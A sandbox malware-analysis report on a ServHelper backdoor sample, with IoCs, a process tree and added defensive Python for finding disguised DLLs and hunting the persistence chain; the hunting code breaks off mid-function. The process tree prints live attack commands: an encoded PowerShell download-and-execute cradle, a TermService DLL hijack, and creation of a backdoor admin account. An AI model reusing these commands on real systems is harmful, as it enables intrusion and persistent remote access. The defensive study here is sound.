Analysis

max time kernel: 124s
max time network: 109s
platform: windows7_x64
resource: win7v20210410
submitted: 09-08-2021 04:21
Static task: static1
Behavioral task: behavioral1 (sample 86178014e457120d9dc6f6e27453338c.exe, resource win7v20210410)
Behavioral task: behavioral2 (sample 86178014e457120d9dc6f6e27453338c.exe, resource win10v20210408)
General

Target: 86178014e457120d9dc6f6e27453338c.exe
Size: 6.0MB
MD5: 86178014e457120d9dc6f6e27453338c
SHA1: 16ab38c0e9c4516532f9d111523e948a6311bfc0
SHA256: d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
SHA512: 746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
Malware Config

Extracted URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
  flow 12, PID 956, powershell.exe
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
  PID 1980 icacls.exe
  PID 544 icacls.exe
  PID 1220 takeown.exe
  PID 2024 icacls.exe
  PID 1716 icacls.exe
  PID 924 icacls.exe
  PID 788 icacls.exe
  PID 932 icacls.exe
Sets DLL path for service in the registry 2 TTPs
-
Yara rule matches (the signature name for this table is not shown on the page):
  resource                        yara_rule
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
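The two PNG-named resources above match the upx yara rule, and the process tree further down points the TermService ServiceDLL at one of them. The following is an added example, not Triage's rule and not the sample's code, of the check an analyst would run over files dropped into C:\Windows\branding: parse the PE headers directly and flag any image that sits behind a non-executable extension or carries UPX's default section names (UPX0/UPX1). The byte strings are a constructed header-only PE and a constructed PNG header, not the page's dropped files; the extension list and the field names in the finding are this example's own choices.

```python
"""Content-vs-extension check for files like the mediasrv.png / mediasvc.png /
wupsvc.jpg drops on this page. Added example: it parses PE headers itself and
reports images hiding behind a non-executable extension or carrying UPX's
default section names. The sample bytes below are constructed, not the
page's dropped files."""
import ntpath
import struct

PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv"}
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}   # what stock UPX names its sections


def parse_pe(data):
    """Return (machine, [section names]) for a PE image, or None if `data` is not one."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size               # section table follows the optional header
    names = []
    for i in range(nsections):
        off = table + i * 40                        # IMAGE_SECTION_HEADER is 40 bytes, Name first
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0"))
    return machine, names


def classify(path, data):
    """Return a finding for a masqueraded or UPX-packed PE at `path`, else None."""
    pe = parse_pe(data)
    if pe is None:
        return None
    machine, names = pe
    masqueraded = ntpath.splitext(path)[1].lower() not in PE_EXTENSIONS
    upx = any(n in UPX_SECTION_NAMES for n in names)
    if not (masqueraded or upx):
        return None
    return {"path": path, "masqueraded": masqueraded, "upx": upx,
            "machine": hex(machine), "sections": [n.decode("ascii", "replace") for n in names]}


def build_sample_pe(section_names, machine=0x8664):
    """Constructed header-only PE32+ image, just enough to exercise parse_pe offline."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 0xF0                                 # size of a PE32+ optional header
    coff = struct.pack("<HHIIIHH", machine, len(section_names), 0, 0, 0, opt_size, 0x2022)
    optional = struct.pack("<H", 0x20B).ljust(opt_size, b"\0")   # 0x20B = PE32+ magic
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + optional + sections


# Constructed stand-ins for the paths on this page; the bytes are synthetic.
SAMPLE_FILES = {
    r"C:\Windows\branding\mediasrv.png": build_sample_pe([b"UPX0", b"UPX1", b".rsrc"]),
    r"C:\Windows\branding\wupsvc.jpg": build_sample_pe([b".text", b".rdata", b".data"]),
    r"C:\Windows\branding\Basebrd": b"\x89PNG\r\n\x1a\n" + b"\0" * 64,   # a real image, not a PE
    r"C:\Windows\System32\termsrv.dll": build_sample_pe([b".text", b".rdata"]),
}


def scan(files):
    """Run classify() over a {path: bytes} map and keep only the findings."""
    findings = []
    for path, data in files.items():
        finding = classify(path, data)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_FILES):
        print(finding)
```

On a live host the same logic would be fed the real bytes of everything under C:\Windows\branding and of whatever path the TermService ServiceDLL value names; a PE with UPX section names under a .png extension in that directory is the combination this report shows.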
Loads dropped DLL 2 IoCs
Processes:
  PID 288 (two loads)
-
Modifies file permissions 1 TTPs 8 IoCs
Processes:
  PID 544 icacls.exe
  PID 1220 takeown.exe
  PID 2024 icacls.exe
  PID 1716 icacls.exe
  PID 924 icacls.exe
  PID 788 icacls.exe
  PID 932 icacls.exe
  PID 1980 icacls.exe
-
Drops file in System32 directory 1 IoCs
Processes:
  File created  C:\Windows\system32\rfxvmt.dll  powershell.exe
  (The takeown/icacls commands in the process tree below then rebuild the TrustedInstaller-owned ACL of a stock System32 binary on this freshly dropped file.)
Drops file in Windows directory 21 IoCs
Processes:
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c261f65c-c5c5-4ee5-8917-969188840c02  powershell.exe
  File created                  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SI4PKHXK8YLXXEWKMU4Q.temp  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ac43274-53cf-491d-a291-6fa27120fe4c  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2b25da9f-166d-4992-81ce-f6008985f3df  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80a98c12-462f-4523-a4ff-4fd85ac77c55  powershell.exe
  File created                  C:\Windows\branding\mediasvc.png  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3b8840d3-d0ba-40c1-9f14-83e71b26a432  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99079d4f-656b-4ea6-a271-7f41dd686224  powershell.exe
  File created                  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e2dc9e65-295b-4a25-9b24-30de871d1037  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_466c1ed4-16fc-42f0-a5cf-9ce89880283a  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_515d8fe1-b2f0-42ea-9770-eb3a85b9c8b4  powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80795e16-a1e7-4269-9c5f-d237f43eef3a  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e411422f-c750-4950-8d1e-f80cc9365c29  powershell.exe
Modifies data under HKEY_USERS 4 IoCs
Processes:
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
  Key created       \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage  powershell.exe
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4073488dd58cd701  powershell.exe
  (S-1-5-20 is NT AUTHORITY\NETWORK SERVICE: these writes come from processes running under the service account, not from the user who launched the sample.)
Modifies registry key 1 TTPs 1 IoCs
  (No IoC row is shown on the page for this signature; in the process tree it is attached to reg.exe PID 284, the command that points the TermService ServiceDLL at C:\Windows\branding\mediasrv.png.)
-
Modifies system certificate store
Processes:
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13  86178014e457120d9dc6f6e27453338c.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob not reproduced on the page)  86178014e457120d9dc6f6e27453338c.exe
  (DAC9024F54D8F6DF94935FB1732638CA6AD77C13 is the SHA-1 thumbprint of the public DST Root CA X3 certificate. Entries under AuthRoot\Certificates are written by Windows' automatic root update when a TLS handshake chains to a root that is not yet cached, so this row is consistent with a side effect of the sample's HTTPS traffic and is not by itself evidence of a rogue root being installed.)
-
Runs net.exe
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
  PID 1472 powershell.exe (5 entries)
  PID 924 powershell.exe (2 entries)
  PID 1308 powershell.exe (2 entries)
  PID 1208 powershell.exe (2 entries)
  PID 956 powershell.exe (2 entries)
-
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
  PID 464 (1 entry)
  PID 288 (4 entries)
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
  SeDebugPrivilege               PID 1084 86178014e457120d9dc6f6e27453338c.exe
  SeDebugPrivilege               PID 1472 powershell.exe
  SeDebugPrivilege               PID 924 powershell.exe
  SeDebugPrivilege               PID 1308 powershell.exe
  SeDebugPrivilege               PID 1208 powershell.exe
  SeRestorePrivilege             PID 1716 icacls.exe
  SeAssignPrimaryTokenPrivilege  PID 1728 WMIC.exe (2 entries)
  SeIncreaseQuotaPrivilege       PID 1728 WMIC.exe (2 entries)
  SeAuditPrivilege               PID 1728 WMIC.exe (2 entries)
  SeAssignPrimaryTokenPrivilege  PID 892 WMIC.exe (2 entries)
  SeIncreaseQuotaPrivilege       PID 892 WMIC.exe (2 entries)
  SeAuditPrivilege               PID 892 WMIC.exe (2 entries)
  SeDebugPrivilege               PID 956 powershell.exe
  (icacls PID 1716 is the /setowner "NT SERVICE\TrustedInstaller" call; assigning ownership to another principal requires SeRestorePrivilege, which is why only that icacls instance enables a privilege.)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  Each parent -> child pair below appeared three times in the raw list; the list stops at 64 entries, so the last pair shows only one.
  PID 1084 86178014e457120d9dc6f6e27453338c.exe -> 1472 powershell.exe
  PID 1472 powershell.exe -> 1752 csc.exe
  PID 1752 csc.exe -> 1348 cvtres.exe
  PID 1472 powershell.exe -> 924 powershell.exe
  PID 1472 powershell.exe -> 1308 powershell.exe
  PID 1472 powershell.exe -> 1208 powershell.exe
  PID 1472 powershell.exe -> 1220 takeown.exe
  PID 1472 powershell.exe -> 2024 icacls.exe
  PID 1472 powershell.exe -> 1716 icacls.exe
  PID 1472 powershell.exe -> 924 icacls.exe
  PID 1472 powershell.exe -> 788 icacls.exe
  PID 1472 powershell.exe -> 932 icacls.exe
  PID 1472 powershell.exe -> 1980 icacls.exe
  PID 1472 powershell.exe -> 544 icacls.exe
  PID 1472 powershell.exe -> 1360 reg.exe
  PID 1472 powershell.exe -> 284 reg.exe
  PID 1472 powershell.exe -> 1276 reg.exe
  PID 1472 powershell.exe -> 1424 net.exe
  PID 1424 net.exe -> 892 net1.exe
  PID 1472 powershell.exe -> 1612 cmd.exe
  PID 1612 cmd.exe -> 1192 cmd.exe
  PID 1192 cmd.exe -> 1716 net.exe (one entry)
Processes

Depth in the tree is shown in brackets and by indentation; each image path is followed by the command line Triage recorded for it and by the signatures attached to that process.

[1] C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe (PID 1084)
    Command line: "C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1472)
      Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1752)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwos05d0\jwos05d0.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 1348)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FB1.tmp" "c:\Users\Admin\AppData\Local\Temp\jwos05d0\CSC22ABBD0B181D470C8ADE18864EE5B39D.TMP"
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 924)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1308)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1208)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\takeown.exe (PID 1220)
        Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID 2024)
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID 1716)
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe (PID 924)
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID 788)
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID 932)
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID 1980)
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe (PID 544)
        Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        - Possible privilege escalation attempt
        - Modifies file permissions
        (The takeown/icacls sequence, from /inheritance:d through the final /grant, reproduces the TrustedInstaller-owned, SYSTEM:RX, Administrators:RX ACL of a stock System32 binary on the dropped rfxvmt.dll.)
    [3] C:\Windows\system32\reg.exe (PID 1360)
        Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        (0x1C21 is 7201 decimal: RDP is moved off its default port 3389.)
    [3] C:\Windows\system32\reg.exe (PID 284)
        Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
        (The stock value is %SystemRoot%\System32\termsrv.dll. Replacing it with the dropped, UPX-packed mediasrv.png makes the Remote Desktop service host load the sample's DLL the next time TermService starts.)
    [3] C:\Windows\system32\reg.exe (PID 1276)
        Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe (PID 1424)
        Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe (PID 892)
          Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe (PID 1612)
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe (PID 1192)
          Command line: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe (PID 1716)
            Command line: net start rdpdr
          [6] C:\Windows\system32\net1.exe (PID 1848)
              Command line: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe (PID 1752)
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      [4] C:\Windows\system32\cmd.exe (PID 1844)
          Command line: cmd /c net start TermService
        [5] C:\Windows\system32\net.exe (PID 932)
            Command line: net start TermService
          [6] C:\Windows\system32\net1.exe (PID 1540)
              Command line: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe (PID 2272)
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe (PID 2284)
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

The processes below have no parent in the tree. The HKEY_USERS writes under S-1-5-20 and the files written under C:\Windows\ServiceProfiles\NetworkService in the signatures above indicate they run as NT AUTHORITY\NETWORK SERVICE, the account TermService runs under, which is consistent with the hijacked ServiceDLL executing once the service was started (an inference from the IoCs on this page, not a Triage signature).

[1] C:\Windows\System32\cmd.exe (PID 1220)
    Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  [2] C:\Windows\system32\net.exe (PID 2024)
      Command line: net.exe user WgaUtilAcc 000000 /del
    [3] C:\Windows\system32\net1.exe (PID 824)
        Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
[1] C:\Windows\System32\cmd.exe (PID 1716)
    Command line: cmd /C net.exe user WgaUtilAcc x2ZZlQ39 /add
  [2] C:\Windows\system32\net.exe (PID 1984)
      Command line: net.exe user WgaUtilAcc x2ZZlQ39 /add
    [3] C:\Windows\system32\net1.exe (PID 892)
        Command line: C:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ39 /add
[1] C:\Windows\System32\cmd.exe (PID 968)
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  [2] C:\Windows\system32\net.exe (PID 1212)
      Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    [3] C:\Windows\system32\net1.exe (PID 824)
        Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
[1] C:\Windows\System32\cmd.exe (PID 956)
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
    (The trailing $ denotes a computer account.)
  [2] C:\Windows\system32\net.exe (PID 892)
      Command line: net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
    [3] C:\Windows\system32\net1.exe (PID 1192)
        Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
[1] C:\Windows\System32\cmd.exe (PID 1336)
    Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  [2] C:\Windows\system32\net.exe (PID 1308)
      Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    [3] C:\Windows\system32\net1.exe (PID 1612)
        Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
[1] C:\Windows\System32\cmd.exe (PID 1716)
    Command line: cmd /C net.exe user WgaUtilAcc x2ZZlQ39
    (net user <name> <password> without /add resets the account's password.)
  [2] C:\Windows\system32\net.exe (PID 788)
      Command line: net.exe user WgaUtilAcc x2ZZlQ39
    [3] C:\Windows\system32\net1.exe (PID 1984)
        Command line: C:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ39
[1] C:\Windows\System32\cmd.exe (PID 1308)
    Command line: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe (PID 1728)
      Command line: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe (PID 1192)
    Command line: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe (PID 892)
      Command line: wmic CPU get NAME
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe (PID 1212)
    Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe (PID 1424)
      Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 956)
        Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        (The -enc argument is base64 of the UTF-16LE string IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), which is the URL in Malware Config above.)
        - Blocklisted process makes network request
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
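The process tree above is the whole persistence chain in command lines: a ServiceDLL hijack of TermService, the RDP listener moved to 0x1C21, ACL work on rfxvmt.dll, a new local administrator in Remote Desktop Users, and an encoded PowerShell download cradle. The following is an added example, not Triage output and not ServHelper's own code, of hunting logic that runs over process-creation telemetry and flags each of those steps, and it decodes the -enc argument to recover the URL shown in Malware Config. The TELEMETRY list is constructed from the command lines on this page in the shape of Sysmon event 1 / EDR records (pid, image, command line); the rule names are this example's own. The one fact it relies on is that the stock TermService ServiceDLL value is %SystemRoot%\System32\termsrv.dll.

```python
"""Hunting rules for the chain in the process tree above: TermService ServiceDLL
hijack, RDP port change, ACL tampering on rfxvmt.dll, local account/group changes
and the encoded PowerShell download cradle. Added example (not Triage output, not
ServHelper code); TELEMETRY is constructed from command lines on this page."""
import base64
import re

# Stock TermService ServiceDLL value; anything else is a hijack.
LEGIT_TERMSRV_DLL = r"%systemroot%\system32\termsrv.dll"

# The -enc argument exactly as it appears in the process tree above.
ENCODED_PS_CMDLINE = (
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQA"
    "cwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBt"
    "AC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

TELEMETRY = [  # constructed (pid, image, command line); PIDs are the ones Triage reported
    (284, r"C:\Windows\system32\reg.exe", r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'),
    (1360, r"C:\Windows\system32\reg.exe", r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'),
    (1220, r"C:\Windows\system32\takeown.exe", r'"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll'),
    (924, r"C:\Windows\system32\icacls.exe", r'"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"'),
    (1424, r"C:\Windows\system32\net.exe", r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'),
    (892, r"C:\Windows\system32\net1.exe", r"C:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ39 /add"),
    (824, r"C:\Windows\system32\net1.exe", r'C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD'),
    (2024, r"C:\Windows\system32\net.exe", r"net.exe user WgaUtilAcc 000000 /del"),  # deletion: no rule should fire
    (956, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ENCODED_PS_CMDLINE),
    (1728, r"C:\Windows\System32\Wbem\WMIC.exe", r"wmic path win32_VideoController get name"),  # benign control
]


def basename(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokens(cmdline):
    """Split a command line, keeping double-quoted arguments together."""
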